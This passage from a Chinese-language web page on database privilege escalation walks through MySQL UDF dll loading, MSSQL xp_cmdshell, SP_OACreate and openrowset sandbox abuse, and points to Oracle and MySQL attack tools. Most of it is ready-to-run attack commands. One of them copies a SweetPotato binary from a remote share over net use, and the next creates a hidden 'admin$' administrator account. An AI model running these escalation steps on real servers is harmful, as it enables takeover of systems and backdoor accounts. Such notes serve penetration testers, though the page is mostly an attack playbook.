</code></pre> <div class="line-numbers-wrapper"><span class="line-number">1</span><br></div></div><h3 id="udf提权">UDF提权 <a href="#udf提权" class="header-anchor">#</a></h3> <p>UDF(user-defined function)是MySQL的一个拓展接口，也可称之为<strong>用户自定义函数</strong></p> <p>用户可以通过自己增加函数对mysql功能进行扩充，文件后缀为.dll</p> <p><strong>利用条件：</strong></p> <blockquote><p><code>Server 2003、Windows XP、Windows 7</code></p> <p>已知mysql中root的账号密码</p> <p>mysql版本 &lt; 5.2 , UDF导出到系统目录c:/windows/system32/</p> <p>mysql版本 &gt; 5.2 ，UDF导出到安装路径MySQL\Lib\Plugin\</p> <p>secure_file_priv为空</p></blockquote> <p><strong>提权原理：</strong></p> <blockquote><p>利用root权限，创建带有调用cmd函数的’udf.dll’(动态链接库)</p> <p>当我们把’udf.dll’导出指定文件夹引入Mysql时，其中的调用函数拿出来当作mysql的函数使用。</p> <p>这样我们自定义的函数才被当作本机函数执行。</p> <p>在使用CREAT FUNCITON调用dll中的函数后，mysql账号转化为system权限，从而提权</p></blockquote> <p>可以直接查询插件安装目录：</p> <div class="language-bash line-numbers-mode"><pre class="language-bash"><code>show variables like %plugin%
</code></pre> <div class="line-numbers-wrapper"><span class="line-number">1</span><br></div></div><p>如果plugin不存在，可以用NTFS ADS流来创建文件夹并导入dll</p> <div class="language-bash line-numbers-mode"><pre class="language-bash"><code><span class="token comment">#先找到Mysql的目录select @@basedir;</span>
<span class="token comment">#利用ADS流来创建plugin文件夹（测试并不能成功创建）select 'It is dll' into dumpfile 'C:\\phpStudy\\PHPTutorial\\MySQL\\lib\\plugin::$INDEX_ALLOCATION';</span>
</code></pre> <div class="line-numbers-wrapper"><span class="line-number">1</span><br><span class="line-number">2</span><br></div></div><p>网上流传的是在数据库中直接就能利用ADS流创建plugin文件夹，但我测试发现直接导入文件可以，并不能创建文件夹。</p> <p>但是利用ADS流确实能创建文件夹，如以下命令（可以自己测试一下）</p> <div class="language-bash line-numbers-mode"><pre class="language-bash"><code><span class="token builtin class-name">echo</span> <span class="token number">123</span> <span class="token operator">&gt;</span> test::<span class="token variable">$INDEX_ALLOCATION</span>
<span class="token comment">#这条命令会创建一个test文件夹</span>
</code></pre> <div class="line-numbers-wrapper"><span class="line-number">1</span><br><span class="line-number">2</span><br></div></div><p>所以我是用<code>Webshell</code>这样创建的plugin文件夹：</p> <div class="language-bash line-numbers-mode"><pre class="language-bash"><code><span class="token builtin class-name">echo</span> <span class="token number">123</span> <span class="token operator">&gt;</span> C:<span class="token punctuation">\</span>phpStudy<span class="token punctuation">\</span>PHPTutorial<span class="token punctuation">\</span>MySQL<span class="token punctuation">\</span>lib<span class="token punctuation">\</span>plugin::<span class="token variable">$INDEX_ALLOCATION</span>
</code></pre> <div class="line-numbers-wrapper"><span class="line-number">1</span><br></div></div><p><strong>有一个自动化工具</strong>：https://github.com/T3st0r-Git/HackMySQL</p> <div class="language-bash line-numbers-mode"><pre class="language-bash"><code><span class="token comment">#上边的创建plugin目录步骤完成后直接利用即可</span>
python root.py -a <span class="token number">192.168</span>.2.9 -proot -e <span class="token string">&quot;whoami&quot;</span>
</code></pre> <div class="line-numbers-wrapper"><span class="line-number">1</span><br><span class="line-number">2</span><br></div></div><p><strong>通过WebShell上传udf.php（这种方法数据库不用外连也可以）</strong></p> <p>udf.php：https://github.com/echohun/tools/blob/master/%E5%A4%A7%E9%A9%AC/udf.php</p> <h3 id="mssql数据库提权">MSSQL数据库提权 <a href="#mssql数据库提权" class="header-anchor">#</a></h3> <p><strong>首先查看权限</strong></p> <div class="language-sql line-numbers-mode"><pre class="language-sql"><code><span class="token comment">--是否sa权限，返回 1 就是sa</span>
<span class="token keyword">select</span> IS_SRVROLEMEMBER<span class="token punctuation">(</span><span class="token string">'sysadmin'</span><span class="token punctuation">)</span>

<span class="token comment">--是否dba权限，返回 1 就是DBA</span>
<span class="token keyword">select</span> IS_MEMBER<span class="token punctuation">(</span><span class="token string">'db_owner'</span><span class="token punctuation">)</span>
</code></pre> <div class="line-numbers-wrapper"><span class="line-number">1</span><br><span class="line-number">2</span><br><span class="line-number">3</span><br><span class="line-number">4</span><br><span class="line-number">5</span><br></div></div><p><strong>一、xp_cmdshell</strong></p> <blockquote><p><strong>适用(xp\2000\2003系统)</strong></p> <p>前提是MSSQL是以system用户运行的，才能提权；</p> <p>如果用nt authority\network service运行，是没有系统权限的。</p></blockquote> <p>默认情况下是关闭的，用下边的命令开启</p> <div class="language-sql line-numbers-mode"><pre class="language-sql"><code><span class="token keyword">EXEC</span> sp_configure <span class="token string">'show advanced options'</span><span class="token punctuation">,</span> <span class="token number">1</span><span class="token punctuation">;</span> <span class="token comment">--允许修改高级参数</span>
<span class="token keyword">RECONFIGURE</span><span class="token punctuation">;</span>
<span class="token keyword">EXEC</span> sp_configure <span class="token string">'xp_cmdshell'</span><span class="token punctuation">,</span> <span class="token number">1</span><span class="token punctuation">;</span> <span class="token comment">--打开xp_cmdshell扩展</span>
<span class="token keyword">RECONFIGURE</span><span class="token punctuation">;</span>
</code></pre> <div class="line-numbers-wrapper"><span class="line-number">1</span><br><span class="line-number">2</span><br><span class="line-number">3</span><br><span class="line-number">4</span><br></div></div><p>如果xp_cmdshell被删除，可以尝试上传<code>xplog70.dll</code> https://fix4dll.com/xplog70_dll 进行恢复，恢复语句：</p> <div class="language-sql line-numbers-mode"><pre class="language-sql"><code><span class="token keyword">Exec</span> master<span class="token punctuation">.</span>dbo<span class="token punctuation">.</span>sp_addextendedproc <span class="token string">'xp_cmdshell'</span><span class="token punctuation">,</span><span class="token string">'c:\\xplog70.dll'</span><span class="token punctuation">;</span>
</code></pre> <div class="line-numbers-wrapper"><span class="line-number">1</span><br></div></div><p>然后执行命令</p> <div class="language-sql line-numbers-mode"><pre class="language-sql"><code><span class="token keyword">exec</span> xp_cmdshell <span class="token string">'whoami'</span><span class="token punctuation">;</span>
</code></pre> <div class="line-numbers-wrapper"><span class="line-number">1</span><br></div></div><p><strong>sa提权登RDP</strong></p> <div class="language-bash line-numbers-mode"><pre class="language-bash"><code><span class="token builtin class-name">exec</span> xp_cmdshell <span class="token string">'net use <span class="token entity" title="\\">\\</span>192.168.10.133\ipc$ mcc5@133 /user:192.168.10.133<span class="token entity" title="\a">\a</span>dministrator&amp;&amp; copy <span class="token entity" title="\\">\\</span>192.168.10.133<span class="token entity" title="\c">\c</span>$\users\public<span class="token entity" title="\v">\v</span>ideos\sweetpotato.exe c:\users\public<span class="token entity" title="\v">\v</span>ideos\s.exe'</span>

<span class="token builtin class-name">exec</span> xp_cmdshell <span class="token string">'c:\users\public<span class="token entity" title="\v">\v</span>ideos\s.exe -a &quot;whoami&quot;'</span>

<span class="token builtin class-name">exec</span> xp_cmdshell <span class="token string">'c:\users\public<span class="token entity" title="\v">\v</span>ideos\s.exe -a &quot;net user admin$ @admin.886 /add&amp;net localgroup administrators admin$ /add&quot;'</span>
</code></pre> <div class="line-numbers-wrapper"><span class="line-number">1</span><br><span class="line-number">2</span><br><span class="line-number">3</span><br><span class="line-number">4</span><br><span class="line-number">5</span><br></div></div><p><strong>二、SP_OACreate</strong></p> <blockquote><p><strong>适用(xp\2000\2003系统)</strong></p></blockquote> <p>当xp_cmdshell 删除以后，还可以使用SP_OACreate</p> <p><strong>首先要打开组件：</strong></p> <div class="language-sql line-numbers-mode"><pre class="language-sql"><code><span class="token comment">--开启EXEC</span>
sp_configure <span class="token string">'show advanced options'</span><span class="token punctuation">,</span> <span class="token number">1</span><span class="token punctuation">;</span>
<span class="token keyword">RECONFIGURE</span><span class="token punctuation">;</span>
<span class="token keyword">EXEC</span> sp_configure <span class="token string">'Ole Automation Procedures'</span><span class="token punctuation">,</span> <span class="token number">1</span><span class="token punctuation">;</span>
<span class="token keyword">RECONFIGURE</span><span class="token punctuation">;</span>

<span class="token comment">--关闭EXEC</span>
sp_configure <span class="token string">'show advanced options'</span><span class="token punctuation">,</span> <span class="token number">0</span><span class="token punctuation">;</span>
<span class="token keyword">RECONFIGURE</span><span class="token punctuation">;</span>
<span class="token keyword">EXEC</span> sp_configure <span class="token string">'Ole Automation Procedures'</span><span class="token punctuation">,</span> <span class="token number">0</span><span class="token punctuation">;</span>
<span class="token keyword">RECONFIGURE</span><span class="token punctuation">;</span>
</code></pre> <div class="line-numbers-wrapper"><span class="line-number">1</span><br><span class="line-number">2</span><br><span class="line-number">3</span><br><span class="line-number">4</span><br><span class="line-number">5</span><br><span class="line-number">6</span><br><span class="line-number">7</span><br><span class="line-number">8</span><br><span class="line-number">9</span><br><span class="line-number">10</span><br><span class="line-number">11</span><br></div></div><p><strong>之后使用以下语句执行命令：</strong></p> <div class="language-sql line-numbers-mode"><pre class="language-sql"><code><span class="token keyword">declare</span> <span class="token variable">@shell</span> <span class="token keyword">int</span> <span class="token keyword">exec</span> sp_oacreate <span class="token string">'wscript.shell'</span><span class="token punctuation">,</span><span class="token variable">@shell</span> output <span class="token keyword">exec</span> sp_oamethod <span class="token variable">@shell</span><span class="token punctuation">,</span><span class="token string">'run'</span><span class="token punctuation">,</span><span class="token boolean">null</span><span class="token punctuation">,</span><span class="token string">'c:\windows\system32\cmd.exe /c whoami &gt;c:\\1.txt'</span>
</code></pre> <div class="line-numbers-wrapper"><span class="line-number">1</span><br></div></div><p><strong>这种方式是无回显的，打开1.txt查看命令执行结果</strong></p> <div class="language-bash line-numbers-mode"><pre class="language-bash"><code><span class="token builtin class-name">type</span> c:<span class="token punctuation">\</span><span class="token punctuation">\</span><span class="token number">1</span>.txt
</code></pre> <div class="line-numbers-wrapper"><span class="line-number">1</span><br></div></div><p><strong>三、openrowset沙盒</strong></p> <blockquote><p><strong>(2003系统可用、2012-r2实验失败)</strong></p></blockquote> <p><strong>首先检查cmd_shell是否开启</strong></p> <div class="language-sql line-numbers-mode"><pre class="language-sql"><code><span class="token keyword">select</span> <span class="token function">count</span><span class="token punctuation">(</span><span class="token operator">*</span><span class="token punctuation">)</span> <span class="token keyword">from</span> master<span class="token punctuation">.</span>dbo<span class="token punctuation">.</span>sysobjects <span class="token keyword">where</span> xtype<span class="token operator">=</span><span class="token string">'x'</span> <span class="token operator">and</span> name<span class="token operator">=</span><span class="token string">'xp_cmdshell'</span>
<span class="token comment">--结果为 1 就是开启</span>
</code></pre> <div class="line-numbers-wrapper"><span class="line-number">1</span><br><span class="line-number">2</span><br></div></div><p><strong>第二步 开启默认关闭的xp_regwrite存储过程</strong></p> <div class="language-sql line-numbers-mode"><pre class="language-sql"><code><span class="token comment">--开启</span>
<span class="token keyword">EXEC</span> master<span class="token punctuation">.</span><span class="token punctuation">.</span>xp_regwrite <span class="token string">'HKEY_LOCAL_MACHINE'</span> <span class="token punctuation">,</span><span class="token string">'SOFTWARE\Microsoft\Jet\4.0\Engines'</span> <span class="token punctuation">,</span><span class="token string">'SandBoxMode'</span> <span class="token punctuation">,</span><span class="token string">'REG_DWORD'</span> <span class="token punctuation">,</span><span class="token number">0</span><span class="token punctuation">;</span>

<span class="token keyword">EXEC</span> sp_configure <span class="token string">'show advanced options'</span><span class="token punctuation">,</span> <span class="token number">1</span>
GO
<span class="token keyword">RECONFIGURE</span>
GO
<span class="token keyword">EXEC</span> sp_configure <span class="token string">'Ad Hoc Distributed Queries'</span><span class="token punctuation">,</span> <span class="token number">1</span>
GO
<span class="token keyword">RECONFIGURE</span>
GO

<span class="token comment">--利用完后恢复</span>
<span class="token keyword">EXEC</span> master<span class="token punctuation">.</span><span class="token punctuation">.</span>xp_regwrite <span class="token string">'HKEY_LOCAL_MACHINE'</span><span class="token punctuation">,</span><span class="token string">'SOFTWARE\Microsoft\Jet\4.0\Engines'</span><span class="token punctuation">,</span><span class="token string">'SandBoxMode'</span><span class="token punctuation">,</span><span class="token string">'REG_DWORD'</span><span class="token punctuation">,</span><span class="token number">1</span><span class="token punctuation">;</span>
<span class="token keyword">EXEC</span> sp_configure <span class="token string">'Ad Hoc Distributed Queries'</span><span class="token punctuation">,</span><span class="token number">0</span><span class="token punctuation">;</span><span class="token keyword">reconfigure</span><span class="token punctuation">;</span>
<span class="token keyword">EXEC</span> sp_configure <span class="token string">'show advanced options'</span><span class="token punctuation">,</span><span class="token number">0</span><span class="token punctuation">;</span><span class="token keyword">reconfigure</span><span class="token punctuation">;</span>
</code></pre> <div class="line-numbers-wrapper"><span class="line-number">1</span><br><span class="line-number">2</span><br><span class="line-number">3</span><br><span class="line-number">4</span><br><span class="line-number">5</span><br><span class="line-number">6</span><br><span class="line-number">7</span><br><span class="line-number">8</span><br><span class="line-number">9</span><br><span class="line-number">10</span><br><span class="line-number">11</span><br><span class="line-number">12</span><br><span class="line-number">13</span><br><span class="line-number">14</span><br><span class="line-number">15</span><br><span class="line-number">16</span><br></div></div><p><strong>利用jet.oledb执行系统命令</strong></p> <div class="language-sql line-numbers-mode"><pre class="language-sql"><code><span class="token keyword">select</span> <span class="token operator">*</span> <span class="token keyword">from</span> <span class="token keyword">openrowset</span><span class="token punctuation">(</span><span class="token string">'microsoft.jet.oledb.4.0'</span> <span class="token punctuation">,</span><span class="token string">';database=c:\windows\system32\ias\ias.mdb'</span> <span class="token punctuation">,</span><span class="token string">'select shell(&quot;cmd.exe /c whoami &gt; c:\\666.txt&quot;)'</span><span class="token punctuation">)</span>
</code></pre> <div class="line-numbers-wrapper"><span class="line-number">1</span><br></div></div><p>这个也是无回显的</p> <p><strong>沙盒模式SandBoxMode参数含义（默认是2）</strong></p> <blockquote><p><code>0</code>：在任何所有者中禁止启用安全模式</p> <p><code>1</code> ：为仅在允许范围内</p> <p><code>2</code> ：必须在access模式下</p> <p><code>3</code>：完全开启</p></blockquote> <p>openrowset是可以通过OLE DB访问SQL Server数据库</p> <p>OLE DB是应用程序链接到SQL Server的的驱动程序</p> <h3 id="oracle提权">Oracle提权 <a href="#oracle提权" class="header-anchor">#</a></h3> <p>利用<a href="https://github.com/jas502n/oracleShell" target="_blank" rel="noopener noreferrer">OracleShell.jar<span><svg xmlns="http://www.w3.org/2000/svg" aria-hidden="true" focusable="false" x="0px" y="0px" viewBox="0 0 100 100" width="15" height="15" class="icon outbound"><path fill="currentColor" d="M18.8,85.1h56l0,0c2.2,0,4-1.8,4-4v-32h-8v28h-48v-48h28v-8h-32l0,0c-2.2,0-4,1.8-4,4v56C14.8,83.3,16.6,85.1,18.8,85.1z"></path> <polygon fill="currentColor" points="45.7,48.7 51.3,54.3 77.2,28.5 77.2,37.2 85.2,37.2 85.2,14.9 62.8,14.9 62.8,22.9 71.5,22.9"></polygon></svg> <span class="sr-only">(opens new window)</span></span></a>工具</p></div> <footer class="page-edit"><!----> <div class="last-updated"><span class="prefix">上次更新:</span> <span class="time">12/18/2021, 12:46:42 PM</span></div></footer> <div class="page-nav"><p class="inner"><span class="prev"><a href="/knowledge/hw/intradomain-port.html" class="prev"><i aria-label="icon: left" class="anticon anticon-left"><svg viewBox="64 64 896 896" focusable="false" data-icon="left" width="1em" height="1em" fill="currentColor" aria-hidden="true"><path d="M724 218.3V141c0-6.7-7.7-10.4-12.9-6.3L260.3 486.8a31.86 31.86 0 0 0 0 50.3l450.8 352.1c5.3 4.1 12.9.4 12.9-6.3v-77.3c0-4.9-2.3-9.6-6.1-12.6l-360-281 360-281.1c3.8-3 6.1-7.7 6.1-12.6z"></path></svg></i>
        域内主机端口探测方法
      </a></span> <span class="next"><a href="/knowledge/hw/hold-root.html">
        权限维持
        <i aria-label="icon: right" class="anticon anticon-right"><svg viewBox="64 64 896 896" focusable="false" data-icon="right" width="1em" height="1em" fill="currentColor" aria-hidden="true"><path d="M765.7 486.8L314.9 134.7A7.97 7.97 0 0 0 302 141v77.3c0 4.9 2.3 9.6 6.1 12.6l360 281.1-360 281.1c-3.9 3-6.1 7.7-6.1 12.6V883c0 6.7 7.7 10.4 12.9 6.3l450.8-352.1a31.96 31.96 0 0 0 0-50.4z"></path></svg></i></a></span></p></div> </main> <!----></div><div class="global-ui"></div></div>
    <script src="/assets/js/app.f7464420.js" defer></script><script src="/assets/js/2.26207483.js" defer></script><script src="/assets/js/61.cd1e3b10.js" defer></script>
  </body>
</html>